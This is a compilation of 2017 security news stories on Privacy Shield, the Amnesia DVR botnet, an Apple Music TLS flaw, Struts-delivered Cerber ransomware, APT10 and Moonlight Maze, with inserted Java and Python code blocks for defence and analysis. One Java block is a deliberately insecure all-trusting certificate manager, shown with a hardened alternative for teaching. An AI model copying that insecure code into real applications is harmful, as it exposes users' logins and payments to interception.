The security firm said it notified the lobbying group of the breach. SecurityWeek has reached out to NFTC for comment and will update this article if the organization responds.

Fidelis also reported seeing a similar campaign involving a fake website of Japan’s Ministry of Foreign Affairs. The APT10 attacks targeting Japan were also detailed in a report published this week by PwC UK and BAE Systems.

The research conducted by the two companies focused on attacks launched by APT10 against managed service providers (MSPs) in at least fourteen countries.


European Parliament Slams Privacy Shield

7.4.2017 securityweek Privacy
The European Parliament on Thursday adopted a resolution (PDF) strongly criticizing the EU-US Privacy Shield. Privacy Shield is the mechanism jointly developed by the European Commission and the US government to replace the earlier Safe Harbor, struck down by the European Court of Justice in 2015. Its purpose is to allow the transfer of EU personal information from Europe to servers in the US.

European law requires that personal information can only be transferred to geographical locations with an equivalent or 'adequate' level of privacy protection. With very different attitudes towards privacy between the US and the EU, it is unlikely that US data protection will ever be considered adequate for EU data. Privacy Shield is designed to provide an agreement between individual US organizations and the EU that they will handle EU data in a manner acceptable to European standards.

Although Privacy Shield has been agreed between the EC and the US and is already in operation, it is not without its critics -- not the least of which is the European Parliament. The stakes are high. While this is not the only legal mechanism for the export of European data to the US, it is the primary one. Others include standard contractual clauses (SCCs); but SCCs are already being challenged by Max Schrems in the Irish High Court. Without an acceptable lawful mechanism, there can be no trade between the US and the EU.

It is generally considered that SCCs will eventually be declared unlawful. "There is the ongoing case in Ireland regarding Standard Contractual Clauses," European privacy consultant Alexander Hanff told SecurityWeek. "This is likely to reach the CJEU and be ruled on in a similar fashion to Safe Harbor which, although will not have a direct impact on Privacy Shield, quite clearly shows the result similar cases (including Binding Corporate Rules and Privacy Shield itself) are likely to achieve."

There is therefore a lot riding on the continuing legality of Privacy Shield. For the moment, this is not as immediately concerning as it may seem. "The EP resolution follows the statement earlier this week from the Commission indicating a review in the Fall," comments David Flint, a senior partner at the MacRoberts law firm. "At this stage, it is merely a reminder of all the matters that the Commission should take account of and noting the residual powers of national DPAs to ban transfers, whilst restating the EP's concerns."

Hanff agrees that there will be little immediate outcome from this resolution. "I am pretty sure that the Commission can ignore the motion and are likely to do so because frankly what other choice do they have at the moment -- if they agree to it, then they are basically accepting that they failed, and the Commission are really not that humble." Politically, he sees a rift in the current Commission between those focused on digital rights and those focused on the Digital Economy; with the latter in the ascendency.

This doesn't mean that there is not a problem. Individual national data protection authorities (DPAs) "do have the power to effectively shut down Privacy Shield by banning transfers based on it on the grounds that it does not meet adequacy requirements," continued Hanff. "They have not done so to date -- I suspect because they have been giving the Commission and the US Government a chance to fix it -- but it seems highly unlikely that that will ever happen."

Hanff notes that there is little actual progress on the Privacy Shield agreement from the US side. "When you consider there is still no Ombudsman and that the Privacy and Civil Liberties Oversight Board is reduced to a non-quorate position where only one of its five seats are currently occupied... even if you completely ignore the woeful inadequacies of the agreement, you cannot ignore that some of the major assurances of that agreement have quite simply not been met. I suspect it is only a matter of time now before one or more of the EU's DPAs makes a stand." The French authority, CNIL, has demonstrated that it would not be afraid to do so, with recent actions against both Google and Microsoft.

One further complication is a hardening of attitudes with the arrival of the Trump administration. "There is no detailed consideration of possible changes as a result of the new US administration, although that remains a significant concern," comments Flint. "The recent policy changes on net neutrality and ISP data sharing exacerbate the concern."

Hanff is more forthright. "One should also be asking questions with regards to the Trump administration and US Congress wiping out ISP privacy rules last week. One must understand that whereas many people focus on the transference of data to a third country when they discuss Privacy Shield (in the case of Privacy Shield, specifically the US) it is not just about the right to transfer; it stems from the right to process - so we must now consider whether a European Citizen visiting the US and using a US carrier for data and voice, have their rights undermined by these recent changes. The obvious answer is yes; however, how we deal with that is much less obvious."

The European Commission is caught in a modern Morton's Fork of its own making. It was instrumental in developing European data protection laws (for human rights reasons), but doesn't wish to abide by them (for economic reasons). Much will hinge on the EC-US talks in the Fall; but today's European Parliament resolution has indicated to the EC what it expects.

If there is no significant move by the US administration to satisfy European concerns, then a rapid legal challenge to the Privacy Shield can be expected. But it should also be noted that the national DPAs do not have to wait for a legal judgment before taking action. The Schrems case that brought down the original Safe Harbor also made it clear that DPAs cannot be bound by EC promulgations. They have, as Hanff notes, "the power to effectively shut down Privacy Shield by banning transfers based on it, on the grounds that it does not meet adequacy requirements."


IoT Botnet "Amnesia" Hijacks DVRs via Unpatched Flaw

7.4.2017 securityweek IoT
A new Linux/IoT botnet named “Amnesia” has been targeting digital video recorders (DVRs) by exploiting an unpatched remote code execution vulnerability disclosed more than one year ago.

The threat, believed to be a variant of the Tsunami botnet, has been analyzed in detail by researchers at Palo Alto Networks. The botnet targets embedded systems, particularly DVRs made by China-based TVT Digital, which are sold under more than 70 brands worldwide.

The vulnerability exploited by the Amnesia malware was disclosed in March 2016 by researcher Rotem Kerner. The expert decided to make his findings public after the vendor ignored his attempts to report the flaw.

The security hole likely remains unpatched and an Internet scan conducted by Palo Alto Networks shows that there are roughly 227,000 vulnerable DVRs in the United States, Taiwan, India, Israel, Turkey, Malaysia and many other countries. A different search carried out via the Censys.io project revealed more than 700,000 IP addresses.

Amnesia has exploited the remote code execution flaw to identify vulnerable DVRs and take complete control of the devices.

Several IoT botnets emerged over the past months, including the notorious Mirai and Remaiten, which also includes capabilities borrowed from Tsunami.

What makes Amnesia interesting is the fact that it has virtual machine (VM) evasion capabilities – experts say this is the first Linux malware that attempts to evade sandboxes.

It’s not uncommon for Windows and Android malware to evade VMs, but such evasion techniques have not been seen in Linux malware.

“Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system,” explained Palo Alto Networks researchers. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”

While Amnesia has yet to be used for large-scale attacks, experts believe it does have the potential to become a major botnet that can cause significant damage.


Flaw in Apple Music for Android Exposes User Data

7.4.2017 securityweek Apple
An update released this week by Apple for the Apple Music application for Android addresses a certificate validation issue that can be exploited to intercept potentially sensitive data.

In addition to a new design and new features, version 2.0 of Apple Music for Android, which according to Google Play has between 10 and 50 million installs, patches a vulnerability that can allow a man-in-the-middle (MitM) attacker to obtain user information.

The vulnerability, tracked as CVE-2017-2387, was reported to Apple by David Coomber of Info-Sec.CA back in August 2016. At the time, the researcher determined that the flaw had affected Apple Music 1.2.1 and earlier versions of the Android app.

In an advisory published this week, Coomber said he asked Apple for a status update in January, and the company said it had still been working on addressing the security hole.

The problem, according to the researcher, was that the app did not validate the SSL certificates received when connecting to the login and payment servers.

“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently,” Coomber explained in his advisory. “Sensitive information could be captured by an attacker without the user's knowledge.”

It’s worth noting that this appears to be the first security advisory released by Apple for the Music app. The Android application was introduced in November 2015.
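The bug both Apple Music articles describe, an app that accepts any server certificate, almost always comes from code like the first half of the following. This is an added example and not code from Apple or from Coomber's advisory: the all-trusting trust manager as it typically appears in Android code, beside a connection that validates the chain against the platform trust store and keeps default hostname verification; the class and method names are assumptions.

```java
import java.io.IOException;
import java.net.URL;
import java.security.GeneralSecurityException;
import java.security.KeyStore;
import java.security.cert.X509Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

/** Added example (hypothetical class name): insecure vs. validated TLS setup for an
 *  HttpsURLConnection on Android. */
public final class TlsValidationExample {

    /** VULNERABLE: a trust manager whose check methods never throw accepts every chain,
     *  so a man-in-the-middle presenting any certificate is accepted silently. This is the
     *  behaviour CVE-2017-2387 describes; flag this shape in code review. */
    static final X509TrustManager ACCEPT_ALL = new X509TrustManager() {
        @Override public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        @Override public void checkServerTrusted(X509Certificate[] chain, String authType) { }
        @Override public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    };

    static HttpsURLConnection openInsecure(URL url) throws IOException, GeneralSecurityException {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { ACCEPT_ALL }, null);
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        // Usually paired with a hostname verifier that accepts everything, which removes
        // the last check tying the presented certificate to the server name.
        conn.setHostnameVerifier((hostname, session) -> true);
        return conn;
    }

    /** Returns the platform's default X509TrustManager, backed by the device trust store. */
    static X509TrustManager platformTrustManager() throws GeneralSecurityException {
        TrustManagerFactory tmf =
                TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null);  // null: use the platform default trust store
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) {
                return (X509TrustManager) tm;
            }
        }
        throw new GeneralSecurityException("no X509TrustManager available");
    }

    /** HARDENED: the chain is validated against the platform trust store and the default
     *  hostname verifier stays in place. checkServerTrusted throws CertificateException
     *  for a chain that does not lead to a trusted root, so a MitM certificate is
     *  rejected and the connection fails instead of leaking login or payment data. */
    static HttpsURLConnection openValidated(URL url) throws IOException, GeneralSecurityException {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { platformTrustManager() }, null);
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        // No setHostnameVerifier call: HttpsURLConnection's default verifier checks that
        // the certificate matches url.getHost().
        return conn;
    }
}
```

The hardened path is what the platform does by default; the bug is always added code, so auditing an app for empty `checkServerTrusted` bodies and constant-true hostname verifiers finds this class of flaw quickly.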


Apache Struts 2 vulnerability exploited to deliver the Cerber ransomware
7.4.2017 securityaffairs Virus

Cyber criminals exploited the recently patched Apache Struts 2 vulnerability CVE-2017-5638 in the wild to deliver the Cerber ransomware.
A recently patched Apache Struts 2 vulnerability, tracked as CVE-2017-5638, has been exploited by crooks in the wild to deliver the Cerber ransomware.

The remote code execution vulnerability affects the Jakarta-based file upload multipart parser in Apache Struts 2. The CVE-2017-5638 flaw was documented on Rapid7’s Metasploit Framework GitHub site, and researchers at Cisco Talos discovered that attackers in the wild were exploiting publicly available PoC code that triggers the issue.

The attackers targeted both Unix and Windows systems to establish backdoors or to infect the system with a DDoS trojan. The recent campaign spotted by researchers at F5 Networks targeted Windows machines.

Since March 20, the experts observed attacks delivering Cerber ransomware to Windows servers.

“This campaign started on the 10th of March, 2017 a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit.” reads the blog post published by F5 Networks.

“The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.”

“Since about a month, we are tracking numerous attempts to exploit the Java Struts2 vulnerability (CVE 2017-5638). Typically, the exploits targeted Unix systems with simple Perl backdoors and bots.” states an analysis published by experts at the SANS Technology Institute. “But recently, I saw a number of exploit attempts targeting Windows systems using a variant of the Cerber ransomware.”

Crooks exploited the CVE-2017-5638 vulnerability to run shell commands and Windows tools like BITSAdmin to download and execute the Cerber malware.

Below is the attack sequence observed by the researchers at the SANS Institute:

The script uses BITSAdmin to download the malware (I obfuscated the URL above).
The malware (“UnInstall.exe”) is saved in the %TEMP% directory.
Finally, the malware is executed.

The experts at F5 Networks analyzed the Bitcoin address where victims are told to send the ransom payment and discovered that it had received 84 bitcoins, roughly $100,000 at the current market value.

“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”
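The trigger F5 describes above is a Content-Type header that carries an expression instead of a media type. The following servlet filter is an added example, not code from F5, SANS or the Struts project: it rejects any request whose Content-Type does not parse as an RFC 7231 media type before the value can reach the multipart parser. The filter name and the 400 response are assumptions, and it is a mitigation layer in front of a vulnerable deployment, not a substitute for upgrading Struts.

```java
import java.io.IOException;
import java.util.regex.Pattern;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/** Added example (hypothetical name): drops requests whose Content-Type is not a
 *  well-formed media type, the malformed input that the CVE-2017-5638 exploit relies on. */
public class ContentTypeGuardFilter implements Filter {

    // RFC 7230 "token" characters: the only ones allowed in type, subtype and parameter names.
    private static final String TOKEN = "[!#$%&'*+\\-.^_`|~0-9A-Za-z]+";
    // parameter = token "=" ( token / quoted-string )
    private static final String PARAM =
            TOKEN + "=(?:" + TOKEN + "|\"(?:[^\"\\\\]|\\\\.)*\")";
    // media-type = type "/" subtype *( OWS ";" OWS parameter ), OWS = spaces or tabs
    private static final Pattern MEDIA_TYPE = Pattern.compile(
            "^" + TOKEN + "/" + TOKEN + "(?:[ \\t]*;[ \\t]*" + PARAM + ")*[ \\t]*$");

    /** True for an absent header or a syntactically valid media type. Any value containing
     *  characters outside the grammar, such as '{', '(' or ')', or a quote outside a
     *  parameter value, is rejected; an OGNL expression smuggled into the header cannot
     *  be written without such characters. */
    static boolean isWellFormedContentType(String value) {
        if (value == null) {
            return true;   // nothing to parse: the multipart parser never sees a header
        }
        if (value.length() > 512) {
            return false;  // a legitimate media type never approaches this length
        }
        return MEDIA_TYPE.matcher(value).matches();
    }

    @Override
    public void init(FilterConfig filterConfig) { }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        if (req instanceof HttpServletRequest) {
            HttpServletRequest http = (HttpServletRequest) req;
            if (!isWellFormedContentType(http.getHeader("Content-Type"))) {
                // Reject before Struts' multipart parser gets to interpret the value.
                ((HttpServletResponse) res).sendError(HttpServletResponse.SC_BAD_REQUEST);
                return;
            }
        }
        chain.doFilter(req, res);
    }

    @Override
    public void destroy() { }
}
```

The grammar is strict: a client that sends a multipart boundary containing characters outside the token set without quoting it will be rejected too, so run the filter in log-only mode against real traffic before enforcing it.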


Operation Cloud Hopper – APT10 goes after Managed Service Providers
7.4.2017 securityaffairs APT

Security experts uncovered a widespread campaign tracked as Operation Cloud Hopper that targets managed service providers (MSPs) worldwide. The Chinese APT10 group is the main suspect.
Security experts from PwC UK and BAE Systems have uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. The experts attributed the operation to the Chinese APT group known as APT10.

The experts gathered evidence suggesting the involvement of the APT10 group; domain registration timing indicates the operation was conducted from China’s time zone.

The attackers used the same malware seen in other attacks attributed to APT10; the Poison Ivy RAT and PlugX are the most popular malicious codes in the group’s arsenal. Experts noticed that from around mid-2016 the group started once again to use PlugX, along with ChChes, Quasar and RedLeaves.

“APT10 has significantly increased its scale and capability since early 2016, including the addition of new custom tools. APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report, which comprehensively detailed the malware’s functionality and features, and its use by several China-based threat actors, including APT10.” reads the report published by the security firms. “APT10 primarily used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardizing their command and control function.”

The Operation Cloud Hopper campaign leveraged well-researched spear-phishing messages aimed at compromising MSPs.

The hackers used this tactic to obtain legitimate credentials, access the client networks of the MSPs and exfiltrate sensitive data.

The attackers aimed to compromise the supply chain to steal intellectual property from the victims.

“Other threat actors have previously been observed using a similar method of a supply chain attack, for example, in the compromise of Dutch certificate authority DigiNotar in 2016 and the compromise of US retailer Target in 2013,” continues the report. “We believe that the observed targeting of MSPs is part of a widescale supply-chain attack.”

Operation Cloud Hopper demonstrates that APT10 focuses on cyber espionage, targeting intellectual property. The authors of the report confirmed that APT10 has exfiltrated a high volume of data from multiple victims by exploiting compromised MSP networks.


Penquin’s Moonlit Maze
6.4.2017 Kaspersky CyberSpy

Download full report (PDF)

Download Appendix B (PDF)

Download YARA rules

Back to the Future – SAS 2016

As Thomas Rid left the SAS 2016 stage, he left us with a claim that turned the heads of the elite researchers who filled the detective-themed Tenerife conference hall. His investigation had turned up multiple sources involved in the original investigation into the historic Moonlight Maze cyberespionage campaign who claimed that the threat actor had evolved into the modern day Turla. What would this all mean?

The Titans of Old

Moonlight Maze is the stuff of cyberespionage legend. In 1996, in the infancy of the Internet, someone was rummaging through military, research, and university networks primarily in the United States, stealing sensitive information on a massive scale. Victims included the Pentagon, NASA, and the Department of Energy, to name a very limited few. The scale of the theft was literally monumental, as investigators claimed that a printout of the stolen materials would stand three times taller than the Washington Monument.

To say that this historic threat actor is directly related to the modern day Turla would elevate an already formidable modern day attacker to another league altogether. Turla is a prolific Russian-speaking group known for its covert exfiltration tactics such as the use of hijacked satellite connections, waterholing of government websites, covert channel backdoors, rootkits, and deception tactics. Its presumed origins track back to the famous Agent.BTZ, a campaign to spread through military networks through the use of USB keys that took formidable cooperation to purge (in the form of an interagency operation codenamed Buckshot Yankee in 2008). Though mitigating the threat got the most attention at the time, further research down the line saw this toolkit connecting directly to the modern Turla.

Further confirmation came through our own Kurt Baumgartner’s research for Virus Bulletin 2014 when he discovered Agent.BTZ samples that contacted a hijacked satellite IP jumping point, the same that was used by Turla later on. This advanced exfiltration technique is classic Turla and cemented the belief that the Agent.BTZ actor and Turla were one and the same. This would place Turla back as early as 2006-2007. But that’s still a decade ahead of the Moonlight Maze attack.

By 2016 the Internet was over-crowded with well-resourced cyberespionage crews. But twenty years ago there were few players in this game. Few paid attention to cyberespionage. In retrospect, we know that the Equation Group was probably active at this time. A command-and-control registration places Equation in the mid-1990s. That makes Equation the longest running cyberespionage group/toolkit in history. To then claim that Turla, in one form or another, was active for nearly as long, places them in a greater league than their pre-historic counterpart in pioneering state-sponsored cyberespionage.

A Working Hypothesis

By the time of the SAS 2016 presentation, we had already discussed at length how one might go about proving this link. The revelation that the Moonlight Maze attacks were dependent on a Solaris/*NIX toolkit and not a Windows one, as is the case with most of Turla, actually revived our hopes. We would not have to look for older Windows samples, where so far there were none, but could instead focus on another discovery. In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for the Linux kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked libpcap and OpenSSL libraries corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s. This all added up to an extremely unusual set of circumstances for malware that was leveraged in attacks from 2011 to 2016, with the latest Penquin sample, discovered just a month ago, having been submitted from a system in Germany.
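The dating evidence described above (a kernel-version ABI tag plus the version banners of statically linked libraries) can be pulled out of an ELF file mechanically. The Python below is an added illustration, not code from the Kaspersky research; the ELF it builds for itself is constructed for the demonstration and is not a Penquin Turla sample.

```python
"""Profile an ELF binary from the evidence the post cites for Penquin Turla:
the minimum kernel version recorded in .note.ABI-tag and the version
banners that statically linked OpenSSL/libpcap leave behind."""
import re
import struct

SHT_NOTE = 7
NT_GNU_ABI_TAG = 1          # desc = os, major, minor, patch (4 x uint32)
# Banner patterns for the two libraries named in the post; constructed, not exhaustive.
VERSION_PATTERNS = {
    "OpenSSL": rb"OpenSSL \d+\.\d+\.\d+[a-z]?",
    "libpcap": rb"libpcap version \d+\.\d+(?:\.\d+)?",
}


def _sections(data):
    """Return ([(name, type, offset, size)], endian_prefix) for ELF32 or ELF64."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    end = "<" if data[5] == 1 else ">"          # EI_DATA: 1 = little, 2 = big endian
    if data[4] == 2:                            # EI_CLASS: ELFCLASS64
        shoff, shentsize, shnum, shstrndx = struct.unpack_from(end + "Q10xHHH", data, 0x28)
        fmt = end + "IIQQQQIIQQ"
    else:                                       # ELFCLASS32 (the Penquin / SPARC / MIPS era)
        shoff, shentsize, shnum, shstrndx = struct.unpack_from(end + "I10xHHH", data, 0x20)
        fmt = end + "IIIIIIIIII"
    hdrs = [struct.unpack_from(fmt, data, shoff + i * shentsize) for i in range(shnum)]
    strtab = hdrs[shstrndx][4]                  # sh_offset of .shstrtab
    out = []
    for h in hdrs:
        start = strtab + h[0]
        name = data[start:data.index(b"\0", start)].decode("ascii", "replace")
        out.append((name, h[1], h[4], h[5]))    # name, sh_type, sh_offset, sh_size
    return out, end


def min_kernel_version(data):
    """Kernel version the binary was built for (e.g. '2.2.5'), or None without an ABI tag."""
    sections, end = _sections(data)
    for _name, stype, off, size in sections:
        if stype != SHT_NOTE:
            continue
        pos, limit = off, off + size
        while pos + 12 <= limit:
            namesz, descsz, ntype = struct.unpack_from(end + "III", data, pos)
            pos += 12
            owner = data[pos:pos + namesz].rstrip(b"\0")
            pos += (namesz + 3) & ~3            # note fields are 4-byte aligned
            desc = data[pos:pos + descsz]
            pos += (descsz + 3) & ~3
            if owner == b"GNU" and ntype == NT_GNU_ABI_TAG and descsz >= 16:
                os_id, major, minor, patch = struct.unpack(end + "IIII", desc[:16])
                if os_id == 0:                  # 0 = Linux
                    return f"{major}.{minor}.{patch}"
    return None


def library_banners(data):
    """Version strings of statically linked libraries found anywhere in the image."""
    found = {}
    for lib, pattern in VERSION_PATTERNS.items():
        m = re.search(pattern, data)
        if m:
            found[lib] = m.group(0).decode()
    return found


def profile(data):
    return {"min_kernel": min_kernel_version(data), "libraries": library_banners(data)}


def build_sample_elf(big_endian=False):
    """Constructed minimal ELF32 (not a real sample): ABI tag for Linux 2.2.5 plus
    OpenSSL/libpcap banners of the kind an early-2000s static build carries."""
    end = ">" if big_endian else "<"
    note = (struct.pack(end + "III", 4, 16, NT_GNU_ABI_TAG) + b"GNU\0"
            + struct.pack(end + "IIII", 0, 2, 2, 5))
    rodata = b"\0OpenSSL 0.9.6b 9 Jul 2001\0libpcap version 0.6.2\0"
    shstrtab = b"\0.note.ABI-tag\0.rodata\0.shstrtab\0"
    note_off = 52                               # right after the ELF32 header
    rodata_off = note_off + len(note)
    strtab_off = rodata_off + len(rodata)
    shoff = strtab_off + len(shstrtab)
    ident = b"\x7fELF" + bytes([1, 2 if big_endian else 1, 1]) + bytes(9)
    machine = 2 if big_endian else 3            # EM_SPARC / EM_386
    ehdr = ident + struct.pack(end + "HHIIIIIHHHHHH", 2, machine, 1, 0, 0, shoff,
                               0, 52, 0, 0, 40, 4, 3)

    def shdr(name_idx, stype, off, size):
        return struct.pack(end + "IIIIIIIIII", name_idx, stype, 0, 0, off, size, 0, 0, 4, 0)

    return (ehdr + note + rodata + shstrtab
            + shdr(0, 0, 0, 0) + shdr(1, SHT_NOTE, note_off, len(note))
            + shdr(15, 1, rodata_off, len(rodata)) + shdr(23, 3, strtab_off, len(shstrtab)))


if __name__ == "__main__":
    print(profile(build_sample_elf()))
```

On a real file, pass `open(path, "rb").read()` to `profile()`; the ABI tag gives a lower bound on the build date, and the banners narrow it further.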


Kurt Baumgartner’s prescient observation upon the discovery of the first Penquin Turla samples

Our working hypothesis became this: “The Turla developers decided to dust down old code and recompile it for current Windows victims in the hope of getting a stealthier beachhead on systems that are less likely to be monitored.” Were that to be the case, Penquin Turla could be the modern link that tied Turla to Moonlight Maze. But in order to prove our hypothesis and this historic evolution, we’d need a glimpse at the original artefacts, something we had no access to.

The Cupboard Samples

Our last hope was that someone somewhere had kept a set of backups collecting dust in a cupboard that they might be willing to share. Thomas took to the road to follow up his sources and eventually stumbled upon something remarkable. The Moonlight Maze operators were early adopters of a certain degree of operational security, using a series of hacked servers as relays to mask their original location. During the later stages of their campaign, they hacked a Solaris box in the U.K. to use as a relay. Unbeknown to them, the system administrator—in cooperation with the Metropolitan Police in London and the FBI—turned the server against the malicious operators. The machine known as ‘HRTest’ would proceed to log everything the attackers did keystroke-by-keystroke and save each and every binary and archive that transited through it. This was a huge win for the original investigators and provided something close to a six-month window of visibility before the attackers ditched this relay site (curiously, as a result of the campaign’s first publicity in early March 1999). Finding these samples was hard and fortuitous—due to a redaction error in an FBI FOIA release, we were able to ultimately track down David Hedges after about a year of sleuthing. “I hear you’re looking for HRTest,” David said when he finally called Thomas for the first time. Then, the now-retired administrator kicked a machine under his desk, chuckling as he said “well it’s sitting right here, and it’s still working.”

Thomas Rid, David Hedges, Daniel Moore, and Juan Andres Guerrero-Saade at King’s College London

Paydirt but not the Motherlode

What we had in our hands allowed us to recreate a portion of the constellation of attacks that constitutes Moonlight Maze. The samples and logs became our obsession for months. While Juan Andres and Costin at GReAT reversed the binaries (most compiled in SPARC for Solaris and MIPS for IRIX, ancient assembly languages), Daniel Moore went so far as to create an entire UI to parse and load the logs onto, so as to be able to visualize the extent of the networks and nodes under attack. We set out to profile our attackers and understand their methods. Among these, some salient features emerged:

Moore’s Rapyd Graph Data Analyzer tracking the victims of Moonlight Maze linked to HRTest

The attackers were prolific Unix users. They used their skills to script their attack phases, which allowed a sort of old school automation. Rather than have the malware communicate to command-and-control servers and carry out functions and exfiltration of their own accord, the attackers would manually log in to victim nodes and leverage scripts and tasking files (usually located in the /var/tmp/ directory) to instruct all of these nodes on what they should do, what information to collect, and finally on where to send it. This allowed them to orchestrate large swaths of infected machines despite being an ‘operator-at-keyboard’ style of attack.
The operators were learning as they went. Our analysis of the binaries shows a trial and error approach to malware development. Many binaries were simply open-source exploits leveraged as needed. Others were open-source backdoors and sniffers. However, despite not having exact compilation timestamps (as Windows executables carry), it’s possible to trace a binary evolution of sorts. The devs would test out new capabilities, then recompile binaries to fix issues and expand functionality as needed. This allowed us to graph a sort of binary tree of development to see how the attack’s functionalities developed throughout this campaign.
Despite their early interest in OpSec, and use of tools specifically designed for this effect, the operators made a huge mistake. It was their standard behavior to use infected machines to look for further victims on the same network or to relay onto other networks altogether. In more than a dozen cases, the attackers had infected a machine with a sniffer that collected any activity on the victim machine and then proceeded to use these machines to connect to other victims. That meant that the attackers actually created near complete logs of everything they themselves did on these systems—and once they did their routine exfiltration, those self-logs were saved on the HRTest node for posterity. The attackers created their own digital footprint for perpetuity.

So what’s the verdict?

A complete analysis of the attack artefacts is provided in the whitepaper, for those interested in a look under the hood of a portion of the Moonlight Maze attacks. For those who would like to jump straight to the conclusion: our parallel investigation into the connection between Moonlight Maze and Turla yielded a more nuanced answer predicated upon the limitations in our visibility.

An objective view of the investigation would have to admit that a conclusion is simply premature. The unprecedented public visibility into the Moonlight Maze attack provided by David Hedges is fascinating, but far from complete. It spans a window between 1998-1999 as well as samples apparently compiled as far back as late 1996. On the other hand, the Penquin Turla codebase appears to have been primarily developed from 1999-2004 before being leveraged in more modern attacks. What we are left with is a circumstantial argument that takes into account the binary evolution witnessed from 1998-1999 as well as the functionality and tools leveraged at that time, both of which point us to a development trend that could lead directly to what is now known as Penquin Turla. This includes the use of tasking files, LOKI2 for covert channel communications, and promiscuous sniffers – all of which made it into the modern Penquin Turla variants.

The next step in our ongoing parallel investigation would have to focus on a little-known operation codenamed ‘Storm Cloud’. This codename represents the evolved toolkit leveraged by the same Moonlight Maze operators once the initial intrusions became public in 1999. In 2003, the story of Storm Cloud leaked with little fanfare, but a few prescient details led us to believe a more definitive answer may be found in this intrusion set:

Storm Cloud reference in a 2003 Wall Street Journal Article mentions further use of LOKI2

Just as the SAS 2016 talk enabled us to find David and his time capsule of Moonlight Maze artefacts, we hope this glimpse into our ongoing research will bring another dedicated sysadmin out of the woodwork who may still have access to Storm Cloud artefacts, allowing us to settle this question once and for all. Beyond the historical value of this understanding, it would afford greater perspective into a tool being leveraged in cyberespionage attacks to this day.


The Mistakes of Smart Medicine
6.4.2017 Kaspersky Safety
As numerous studies have shown, smart houses, smart cars, and smart cities are undeniably beneficial to people in everyday life, but quite often can become a threat to their safety. It is not only a matter of personal data leakage. Just imagine that, for example, a smart refrigerator, affected by a third party at one point or another, would begin identifying expired products as fresh. There is yet another more dismal scenario: the system of a smart car turns the vehicle to the right at high speed, catching the driver unaware…

However, both existing and foreseeable threats that emerge from home IoT devices are only part of the problem related to the infrastructure around us becoming “smarter”. A technological boom in medicine both encouraged medical institutions to process data exclusively with information systems and led to the emergence of new types of technological equipment and personal devices that can be used to interact with traditional systems and networks. This means that the threats that are relevant for those systems and networks can also be relevant for medical systems.

Entry Points for Accessing Valuable Data

For the medical industry, the main attack vector is related to personal data and information on the health condition of patients. The first step in evaluating the security level for data is identifying entry points within the infrastructure of medical institutions where healthcare data can be collected, stored, and/or taken advantage of by an evildoer.

Possible entry points can be classified as follows:

information systems on the computer network of a medical institution (servers, workstations, admin panels for medical equipment, etc.) that access the Internet;
medical equipment that is connected to an enterprise network;
medical equipment that is not a network node but connects to a workstation (for example, via USB);
portable devices of patients (advanced fitness trackers, pacemakers and cardiac monitors, insulin pumps, etc.) and mobile devices that can track health indicators (mobile smartphones and smart watches);
other wireless information systems (Wi-Fi, Bluetooth, or RF), which can be mobile ECG devices, pulse oximeters, event monitors for tracking the medical condition of high-risk patients, and so on.
For the last three classes mentioned above, a detailed first-hand analysis of specific models related to these classes is required. It is for exactly this reason that those devices deserve an article of their own. For now, we will focus on devices and their components that do not require physical access and are frequently accessible from the Internet.

Portable Devices May Port Medical Histories

We’ve already written the following about the security of portable devices in March of 2015: “Just imagine, if a fitness tracker with a heart-rate monitor is hacked, then any shop owner will be able to track the heart rate of buyers as they look at discounts in the shop. The influence of advertisements on people can be learned in the same manner. Moreover, a hacked fitness tracker with a heart-rate monitor can be used as a lie detector.”

Owing to the increasing accuracy of sensors, gadgets that collect data on the health condition of their owners can potentially be used in serious ambulatory care to assess a patient’s health. However, the level of security for these gadgets has not been developing as fast as their capabilities.

Tracking vital signs with the help of mobile devices may become an integral part of ambulatory care in the nearest future

